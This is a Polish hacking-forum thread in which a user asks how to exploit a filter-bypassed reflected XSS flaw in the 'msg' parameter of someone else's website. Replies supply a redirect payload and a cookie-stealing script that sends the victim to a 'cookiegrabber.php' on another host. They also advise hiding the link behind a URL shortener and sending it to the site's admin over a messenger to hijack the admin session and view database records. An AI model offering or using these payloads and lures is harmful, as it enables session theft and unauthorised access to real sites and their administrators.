Jak wykorzysrać pewną lukę na stronie?

[ShutDown]

Dzień dobry

Znalazłem pewną lukę w bezpieczeństwie pewnej strony, która jest dosyć dobrze zabezpieczona (https, itp :] ) Jednak ma jedną rzecz, którą można by było chyba wykorzystać:
Po wpisaniu w adresie "https://tastrona.pl/index.php?msg=TA TRESC POJAWIA SIE NA STRONIE"
Treść wpisana w zmiennej msg pojawia się na stronie, tak są pokazywane błędy. Ta część ma pewien filtr, który udało mi się ominąć tak że można użyć XSS. Tylko czy czy jest to naprawdę luka w bezpieczeństwie czy nie?Czy można to jakoś wykorzystać?

[Ormi]

Mozna tylko zdobyć ciasteczka użytkownika, ktory kliknie w odpowiedni link. Nic wiecej

[rafal44]

Możesz przekierować użytkowników na inną stronę, np:

Kod:

<script>self.location.href='http://www.hack.pl';</script>

[javaman]

nie jest to na pewno zagrożenie dla strony samej w sobie. Do włamki raczej tego nie "WYKORZYSRASZ"

[Teeed]

I wlanie dlatego uwazam atak XSS za nieprzydatny przy przejmowaniu serwera...

[ShutDown]

Dziękuję bardzo za odpowiedź.

[edosinx]

I wlanie dlatego uwazam atak XSS za nieprzydatny przy przejmowaniu serwera...

Hmm... nie wiem jak działa PHPMyAdmin albo inne systemy do zarządzania bazą danych ze strony, ale jeśli zalogowany admin wejdzie na stronę w której ktoś wykorzystał XSSa i wtedy ten ktoś wejdzie z session id admina to mógłby przejrzeć rekordy w bazie danych? :P

[Ormi]

Chyba zależy od systemu zarządzania, ale zwykle tak. Tyle, że trzeba go zmusić do kliknięcia w odpowiedni link,a chyba żaden rozsądny admin nie kliknie w linkr w rodzaju jegostrona.pl/?co=<script>self.location="http://strona.pl/cookiegrabber.php"</script>
Chyba, żeby to zrealizować tak:
Na jakiejś swojej niewinnej stronce dać taki kod:
<script>self.location="jegostrona.pl/?co=<script>self.location=\"http://strona.pl/cookiegrabber.php\"</script>"</script>
W link do takiej strony podesłać adminowi

[edosinx]

Chyba zależy od systemu zarządzania, ale zwykle tak. Tyle, że trzeba go zmusić do kliknięcia w odpowiedni link,a chyba żaden rozsądny admin nie kliknie w linkr w rodzaju jegostrona.pl/?co=<script>self.location="http://strona.pl/cookiegrabber.php"</script>
Chyba, żeby to zrealizować tak:
Na jakiejś swojej niewinnej stronce dać taki kod:
<script>self.location="jegostrona.pl/?co=<script>self.location=\"http://strona.pl/cookiegrabber.php\"</script>"</script>
W link do takiej strony podesłać adminowi

Ojoj, zapomniałem że ten XSS jest dopisywany do URLa Pisałem myśląc o błędzie XSS w komentarzu czy gdzieś gdzie dopiszemy i siedzi na stałe No tak, w takim razie trzeba wrzucić w tinyurl i podesłać na gg jak to nieraz można zauważyć dostając link do 'super strony z super muzą od koleżanki Ani/Kasi z podstawówki' :P

A skoro już jesteśmy przy XSS i wykonywaniu JSa. Mogło mi się coś pomerdać, ale jestem prawie przekonany że pare lat temu, gdy jeszcze wielu rzeczy nie wiedziałem, zdarzało mi się czasem trafić na jakąś stronę, gdzie po samym wejściu instalowały mi się Dialery i inny szajs. Nie ściągałem żadnego oprogramowania, tylko wchodziłem i już zonk, komp zasyfiony. Jak było to zrobione? Jakieś luki w JS w przeglądarkach pozwalające wykonać dowolny kod?